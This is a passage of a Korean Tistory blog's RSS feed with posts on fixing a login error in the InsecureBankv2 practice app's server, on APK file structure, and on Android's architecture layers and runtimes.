<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
  <channel>
    <title>zzasgi</title>
    <link>https://zzasgi.tistory.com/</link>
    <description></description>
    <language>ko</language>
    <pubDate>Tue, 7 Jul 2026 00:27:40 +0900</pubDate>
    <generator>TISTORY</generator>
    <ttl>100</ttl>
    <managingEditor>zzasgi</managingEditor>
    <item>
      <title>[InsecureBankv2] 서버에러</title>
      <link>https://zzasgi.tistory.com/28</link>
      <description>&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;a href=&quot;#d1e63032-3e3a-46d0-966c-d6a15c6fc66f&quot;&gt;에러발생&lt;/a&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;a href=&quot;#6b65d5e3-6b24-4d16-af19-fe1a16b43fcb&quot;&gt;원인&lt;/a&gt;&lt;/p&gt;
&lt;h2 data-ke-size=&quot;size26&quot;&gt;에러발생&lt;/h2&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-origin-width=&quot;1223&quot; data-origin-height=&quot;72&quot; data-ke-mobilestyle=&quot;widthOrigin&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/blTWzh/btrgoJVJsUr/lN3uiXgKE4GfUIYZ8EkHmK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/blTWzh/btrgoJVJsUr/lN3uiXgKE4GfUIYZ8EkHmK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/blTWzh/btrgoJVJsUr/lN3uiXgKE4GfUIYZ8EkHmK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FblTWzh%2FbtrgoJVJsUr%2FlN3uiXgKE4GfUIYZ8EkHmK%2Fimg.png&quot; data-origin-width=&quot;1223&quot; data-origin-height=&quot;72&quot; data-ke-mobilestyle=&quot;widthOrigin&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;InsecureBank 앱은 서버 구동시 정상적으로 작동하는 것을 확인함.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-origin-width=&quot;551&quot; data-origin-height=&quot;705&quot; data-ke-mobilestyle=&quot;widthOrigin&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/l3V5l/btrgkTZiIu9/ZK8okozQlld5NfekUHzuC0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/l3V5l/btrgkTZiIu9/ZK8okozQlld5NfekUHzuC0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/l3V5l/btrgkTZiIu9/ZK8okozQlld5NfekUHzuC0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fl3V5l%2FbtrgkTZiIu9%2FZK8okozQlld5NfekUHzuC0%2Fimg.png&quot; data-origin-width=&quot;551&quot; data-origin-height=&quot;705&quot; data-ke-mobilestyle=&quot;widthOrigin&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-origin-width=&quot;1197&quot; data-origin-height=&quot;569&quot; data-ke-mobilestyle=&quot;widthOrigin&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/pIMTS/btrgnrnS8S6/MgPfZuLljK0UxFFuBPhov0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/pIMTS/btrgnrnS8S6/MgPfZuLljK0UxFFuBPhov0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/pIMTS/btrgnrnS8S6/MgPfZuLljK0UxFFuBPhov0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FpIMTS%2FbtrgnrnS8S6%2FMgPfZuLljK0UxFFuBPhov0%2Fimg.png&quot; data-origin-width=&quot;1197&quot; data-origin-height=&quot;569&quot; data-ke-mobilestyle=&quot;widthOrigin&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;하지만 로그인 기능 이용시 로그인이 안되거나 위와 같은 에러가 발생하는 경우가 있다.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 data-ke-size=&quot;size26&quot;&gt;원인&lt;/h2&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;일부 툴을 사용할 때 경로에 한글이 들어가게 되면 에러가 발생하면서 동작을 안하는 경우가 있는데 app.py에서 db와 연결될 때 경로에 한글이 들어가게 되면 동작하지 않는 것으로 추측된다.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-origin-width=&quot;552&quot; data-origin-height=&quot;678&quot; data-ke-mobilestyle=&quot;widthOrigin&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/N1djK/btrgoAq66uM/NOuQEeQM5W0XxuDSC75OZk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/N1djK/btrgoAq66uM/NOuQEeQM5W0XxuDSC75OZk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/N1djK/btrgoAq66uM/NOuQEeQM5W0XxuDSC75OZk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FN1djK%2FbtrgoAq66uM%2FNOuQEeQM5W0XxuDSC75OZk%2Fimg.png&quot; data-origin-width=&quot;552&quot; data-origin-height=&quot;678&quot; data-ke-mobilestyle=&quot;widthOrigin&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-origin-width=&quot;1189&quot; data-origin-height=&quot;145&quot; data-ke-mobilestyle=&quot;widthOrigin&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bdi4Jq/btrgh9aWgtA/tNVqYgMcIePSdCXod4CIaK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bdi4Jq/btrgh9aWgtA/tNVqYgMcIePSdCXod4CIaK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bdi4Jq/btrgh9aWgtA/tNVqYgMcIePSdCXod4CIaK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fbdi4Jq%2Fbtrgh9aWgtA%2FtNVqYgMcIePSdCXod4CIaK%2Fimg.png&quot; data-origin-width=&quot;1189&quot; data-origin-height=&quot;145&quot; data-ke-mobilestyle=&quot;widthOrigin&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;기존에 한글로 되어있던 디렉터리 이름을 영어로 바꾼 뒤 로그인을 하니 정상적으로 동작하며 서버에 로그인 정보 뜨는 것을 확인할 수 있다.&lt;/li&gt;
&lt;/ul&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;a href=&quot;https://boltlessengineer.github.io/Notion2Tistory&quot;&gt;Uploaded by Notion2Tistory v1.1.0&lt;/a&gt;&lt;/p&gt;</description>
      <author>zzasgi</author>
      <guid isPermaLink="true">https://zzasgi.tistory.com/28</guid>
      <comments>https://zzasgi.tistory.com/28#entry28comment</comments>
      <pubDate>Wed, 29 Sep 2021 15:05:51 +0900</pubDate>
    </item>
    <item>
      <title>APK 파일 구조</title>
      <link>https://zzasgi.tistory.com/26</link>
      <description>&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;a href=&quot;#4ae31246-49d7-4c59-9a43-3e7e24120f88&quot;&gt;APK란?&lt;/a&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;a href=&quot;#4f1bcf7c-33e0-4d75-bccc-7889a21606ae&quot;&gt;APK 파일 구조&lt;/a&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;a href=&quot;#85eff672-5c2a-436b-81f4-ebc8cf96a2ea&quot;&gt;Reference&lt;/a&gt;&lt;/p&gt;
&lt;h2 data-ke-size=&quot;size26&quot;&gt;APK란?&lt;/h2&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;안드로이드 앱의 확장자로서 Android Application Package 의 줄임말이다. 앱을 설치하는 역할을 하며, ZIP 형식으로 압축되어 있다.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 data-ke-size=&quot;size26&quot;&gt;APK 파일 구조&lt;/h2&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-origin-width=&quot;730&quot; data-origin-height=&quot;475&quot; data-ke-mobilestyle=&quot;widthOrigin&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/kTvf4/btrgofHs1cO/t2dKQN9rLg6NtWkf6fTaQk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/kTvf4/btrgofHs1cO/t2dKQN9rLg6NtWkf6fTaQk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/kTvf4/btrgofHs1cO/t2dKQN9rLg6NtWkf6fTaQk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FkTvf4%2FbtrgofHs1cO%2Ft2dKQN9rLg6NtWkf6fTaQk%2Fimg.png&quot; data-origin-width=&quot;730&quot; data-origin-height=&quot;475&quot; data-ke-mobilestyle=&quot;widthOrigin&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;META-INF
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;인증 서명과 관련한 정보가 담겨있는 디렉터리&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;assets
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;의미 그대로 앱 실행에 필요한 자원들이 저장되는 디렉터리.&lt;/li&gt;
&lt;li&gt;res 디렉터리와 중복되는 것 같지만 용량이 큰 파일 위주로 저장된다.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;res
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;앱 실행에 필요한 자원이 모여있는 디렉터리
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;Drawable : 프로젝트에 활용될 이미지들&lt;/li&gt;
&lt;li&gt;Layout : 안드로이드 화면을 담당하는 xml들의 집함&lt;/li&gt;
&lt;li&gt;Values
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;dimens.xml : 텍스트 크기, 도형 크기 등 크기에 관련된 설정 파일&lt;/li&gt;
&lt;li&gt;strings.xml : 문자열에 관련된 설정 파일&lt;/li&gt;
&lt;li&gt;styles.xml : 색상, 액션바 유무, 배경 색 등 화면 디자인 관련 설정을 정의res&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;assets 디렉터리에 비해 용량이 작은 파일 위주로 저장된다.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-origin-width=&quot;756&quot; data-origin-height=&quot;228&quot; data-ke-mobilestyle=&quot;widthOrigin&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/kzwME/btrgijqGKkA/rDMrTKkCJapVFTz1EHkrl1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/kzwME/btrgijqGKkA/rDMrTKkCJapVFTz1EHkrl1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/kzwME/btrgijqGKkA/rDMrTKkCJapVFTz1EHkrl1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FkzwME%2FbtrgijqGKkA%2FrDMrTKkCJapVFTz1EHkrl1%2Fimg.png&quot; data-origin-width=&quot;756&quot; data-origin-height=&quot;228&quot; data-ke-mobilestyle=&quot;widthOrigin&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;lib
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;라이브러리 파일들이 저장되는 디렉터리&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;AndroidManifest.xml
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;어플리케이션을 구성하는 컴포넌트 및 패키지명, 버전과 같은 앱의 정보가 저장되는 파일이다.&lt;/li&gt;
&lt;li&gt;AndroidManifest.xml 의 주요 컴포넌트
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;Activity : Activity는 일반적으로 하나의 뷰를 말하며, 해당 Activity에 대한 속성을 정의함&lt;/li&gt;
&lt;li&gt;Service : 백그라운드에서 실행되는 서비스&lt;/li&gt;
&lt;li&gt;Broadcast Receiver : 안드로이드 내부 이벤트 핸들링을 위한 컴포넌트 ex) 문자수신, 베터리 부족&lt;/li&gt;
&lt;li&gt;Content Provide : 어플리케이션간 데이터 공유를 위한 컴포넌트&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;class.dex
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;.class 파일을 달빅 바이트 코드로 변환시킨 소스 파일&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;resources.arsc
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;res의 정보가 기록되어 있다.&lt;/li&gt;
&lt;li&gt;컴파일된 리소스(문자열, 스타일 등)가 존재&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 data-ke-size=&quot;size26&quot;&gt;Reference&lt;/h2&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;a href=&quot;https://m.blog.naver.com/PostView.naver?isHttpsRedirect=true&amp;amp;blogId=ilikebigmac&amp;amp;logNo=221466806806&quot;&gt;https://m.blog.naver.com/PostView.naver?isHttpsRedirect=true&amp;amp;blogId=ilikebigmac&amp;amp;logNo=221466806806&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;a href=&quot;https://medium.com/@logishudson0218/android-apk%EC%9D%98-%EA%B5%AC%EC%84%B1%EA%B3%BC-%EC%83%88%EB%A1%9C%EC%9A%B4-app-bundle-%EB%B0%A9%EC%8B%9D-274b1a4cfb62&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;https://medium.com/@logishudson0218/android-apk%EC%9D%98-%EA%B5%AC%EC%84%B1%EA%B3%BC-%EC%83%88%EB%A1%9C%EC%9A%B4-app-bundle-%EB%B0%A9%EC%8B%9D-274b1a4cfb62&lt;/a&gt;&lt;/p&gt;
&lt;figure id=&quot;og_1632895028352&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;article&quot; data-og-title=&quot;Android APK의 구성과 새로운 APP Bundle 방식&quot; data-og-description=&quot;Android APK의 구성&quot; data-og-host=&quot;medium.com&quot; data-og-source-url=&quot;https://medium.com/@logishudson0218/android-apk%EC%9D%98-%EA%B5%AC%EC%84%B1%EA%B3%BC-%EC%83%88%EB%A1%9C%EC%9A%B4-app-bundle-%EB%B0%A9%EC%8B%9D-274b1a4cfb62&quot; data-og-url=&quot;https://medium.com/@logishudson0218/android-apk%EC%9D%98-%EA%B5%AC%EC%84%B1%EA%B3%BC-%EC%83%88%EB%A1%9C%EC%9A%B4-app-bundle-%EB%B0%A9%EC%8B%9D-274b1a4cfb62&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/bB7X4H/hyLLFJnkTb/bUrdKm5s38dbiB7ja0B9ek/img.png?width=1200&amp;amp;height=319&amp;amp;face=0_0_1200_319,https://scrap.kakaocdn.net/dn/hCxFy/hyLLGIkUo4/9wMtODKeXF3GjIkQ3hY2L1/img.png?width=60&amp;amp;height=35&amp;amp;face=0_0_60_35,https://scrap.kakaocdn.net/dn/cTlGAH/hyLNnUEU2P/Xby1CJty4jWkfGN8PFtKqK/img.png?width=60&amp;amp;height=33&amp;amp;face=0_0_60_33&quot;&gt;&lt;a href=&quot;https://medium.com/@logishudson0218/android-apk%EC%9D%98-%EA%B5%AC%EC%84%B1%EA%B3%BC-%EC%83%88%EB%A1%9C%EC%9A%B4-app-bundle-%EB%B0%A9%EC%8B%9D-274b1a4cfb62&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://medium.com/@logishudson0218/android-apk%EC%9D%98-%EA%B5%AC%EC%84%B1%EA%B3%BC-%EC%83%88%EB%A1%9C%EC%9A%B4-app-bundle-%EB%B0%A9%EC%8B%9D-274b1a4cfb62&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/bB7X4H/hyLLFJnkTb/bUrdKm5s38dbiB7ja0B9ek/img.png?width=1200&amp;amp;height=319&amp;amp;face=0_0_1200_319,https://scrap.kakaocdn.net/dn/hCxFy/hyLLGIkUo4/9wMtODKeXF3GjIkQ3hY2L1/img.png?width=60&amp;amp;height=35&amp;amp;face=0_0_60_35,https://scrap.kakaocdn.net/dn/cTlGAH/hyLNnUEU2P/Xby1CJty4jWkfGN8PFtKqK/img.png?width=60&amp;amp;height=33&amp;amp;face=0_0_60_33');&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;Android APK의 구성과 새로운 APP Bundle 방식&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;Android APK의 구성&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;medium.com&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;a href=&quot;https://boltlessengineer.github.io/Notion2Tistory&quot;&gt;Uploaded by Notion2Tistory v1.1.0&lt;/a&gt;&lt;/p&gt;</description>
      <category>모바일</category>
      <author>zzasgi</author>
      <guid isPermaLink="true">https://zzasgi.tistory.com/26</guid>
      <comments>https://zzasgi.tistory.com/26#entry26comment</comments>
      <pubDate>Wed, 29 Sep 2021 14:49:33 +0900</pubDate>
    </item>
    <item>
      <title>안드로이드 아키텍처</title>
      <link>https://zzasgi.tistory.com/25</link>
      <description>&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;a href=&quot;#9a31257a-fa54-4b63-acff-7e3ab0e8c83f&quot;&gt;안드로이드 아키텍처 구조&lt;/a&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;a href=&quot;#3a98c23c-94b5-429e-87e9-3bc24f76ff9d&quot;&gt;커널계층&lt;/a&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;a href=&quot;#0ea8c3f9-91a9-43b5-9598-0162d4d52cbb&quot;&gt;라이브러리 계층&lt;/a&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;a href=&quot;#ff01ca73-d27b-4899-94b9-dbe2d89cfabe&quot;&gt;런타임 계층&lt;/a&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;a href=&quot;#849ce74f-82b7-4211-bf5a-9e6dbba02b9f&quot;&gt;프레임워크 계층&lt;/a&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;a href=&quot;#0ccda266-084f-48af-81ce-1e240f2df2ba&quot;&gt;어플리케이션 계층&lt;/a&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;a href=&quot;#387d0799-760a-4102-9044-6b23c0a925d6&quot;&gt;안드로이드 보안 모델&lt;/a&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;a href=&quot;#0bb80bec-99a6-4b42-8ad3-187794d88370&quot;&gt;패키지 파일(APK)&lt;/a&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;a href=&quot;#8f1e8924-e519-4b8e-a400-0d43ee14c97c&quot;&gt;Reference&lt;/a&gt;&lt;/p&gt;
&lt;h2 data-ke-size=&quot;size26&quot;&gt;안드로이드 아키텍처 구조&lt;/h2&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-origin-width=&quot;713&quot; data-origin-height=&quot;512&quot; data-ke-mobilestyle=&quot;widthOrigin&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bomm56/btrgfOrwUnR/J8xUhc2GXKDqLPVAeCiBd0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bomm56/btrgfOrwUnR/J8xUhc2GXKDqLPVAeCiBd0/img.png&quot; data-alt=&quot;안드로이드 아키텍처&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bomm56/btrgfOrwUnR/J8xUhc2GXKDqLPVAeCiBd0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fbomm56%2FbtrgfOrwUnR%2FJ8xUhc2GXKDqLPVAeCiBd0%2Fimg.png&quot; data-origin-width=&quot;713&quot; data-origin-height=&quot;512&quot; data-ke-mobilestyle=&quot;widthOrigin&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;안드로이드 아키텍처&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;어플리케이션 계층&lt;/li&gt;
&lt;li&gt;프레임워크 계층&lt;/li&gt;
&lt;li&gt;런타임 계층&lt;/li&gt;
&lt;li&gt;네이티브 라이브러리 계층&lt;/li&gt;
&lt;li&gt;커널 계층&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;커널계층&lt;/h3&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;하드웨어, 네트워크, 파일 시스템 접근 등 시스템 전체의 중심 역할 수행&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;라이브러리 계층&lt;/h3&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;네이티브 라이브러리를 제공하기 위한 계층
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;SQLite, WebKit, Media(코텍 지원) 등&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;런타임 계층&lt;/h3&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;자바 바이트 코드를 DEX 포맷으로 변환하여 패키징 후 실행함&lt;/li&gt;
&lt;li&gt;안드로이드 7.0 누가(API24) 이후의 ART VM 에서는 JIT와 AOT를 모두 사용한다.&lt;/li&gt;
&lt;li&gt;Dalvik, ART
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;Dalvik : JIT(Just In Time)
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;자바 바이트 코드(.class)를 달빅 바이트 코드(.dex)로 변환해 두고, 이를 런타임에 JIT 컴파일하며 실행하는 방식&lt;/li&gt;
&lt;li&gt;중간 언어를 실행하는 것이라 JVM처럼 중간 언어를 해석해줄 Dalvik VM이 필요하다.&lt;/li&gt;
&lt;li&gt;앱이 실행되는 순간 자주 사용되는 코드를 컴파일함&lt;/li&gt;
&lt;li&gt;설치 속도는 빠르지만 실행 시 마다 컴파일을 진행하기 때문에 실행 시간이 비교적 느림&lt;/li&gt;
&lt;li&gt;용량 작음&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;ART : AOT(Ahead Of Time)
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;.dex 파일을 .oat 파일로 컴파일하므로 중간 언어(달빅 바이트 코드)를 받아 Native binary로 컴파일하는 방식&lt;/li&gt;
&lt;li&gt;.oat 파일은 Native machine code로 되어있기 때문에 VM 없이 실행 가능하지만, Dalvik과의 하위 호환성때문에 VM 위에서 돌아가는 것 처럼 실행된다.&lt;/li&gt;
&lt;li&gt;앱 설치 시 모든 코드를 컴파일함&lt;/li&gt;
&lt;li&gt;설치 시 컴파일을 완료하기 때문에 비교적 설치 속도가 느리지만, 실행 속도가 빠름&lt;/li&gt;
&lt;li&gt;용량 큼&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;프레임워크 계층&lt;/h3&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;JAVA API가 존재하며, 안드로이드 OS의 기능은 해당 API를 통해서 접근함
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;Activity Manager : 액티비티의 생명주기를 호출, 공통적인 네비게이션 백스택을 제공&lt;/li&gt;
&lt;li&gt;Resource Manager : 문자열, 그래픽, 레이아웃 파일 등 리소스를 찾아주는 역할&lt;/li&gt;
&lt;li&gt;View System : 리스트, 그리드, 텍스트 뷰, 버튼, 웹 뷰 등 뷰들의 집합&lt;/li&gt;
&lt;li&gt;Content Provider : 안드로이드 4대 컴포넌트 중 하나, 어플리케이션이 다른 어플리케이션으로부터 데이터를 액세스하거나, 자신의 데이터를 공유함&lt;/li&gt;
&lt;li&gt;Package Manager : 현재 디바이스에 설치된 어플리케이션과 관련된 정보를 가지고 있음&lt;/li&gt;
&lt;li&gt;Notification Manager : 모든 어플리케이션의 상태표시줄에 사용자 지정 알림을 표시 할 수 있도록 지원함&lt;/li&gt;
&lt;li&gt;Window Manager : 화면에 대한 정보, 배치 등을 관리하는 시스템 서비스&lt;/li&gt;
&lt;li&gt;Telephony Manager : 단말기의 상태에 대한 정보를 얻을 수 있는 서비스&lt;/li&gt;
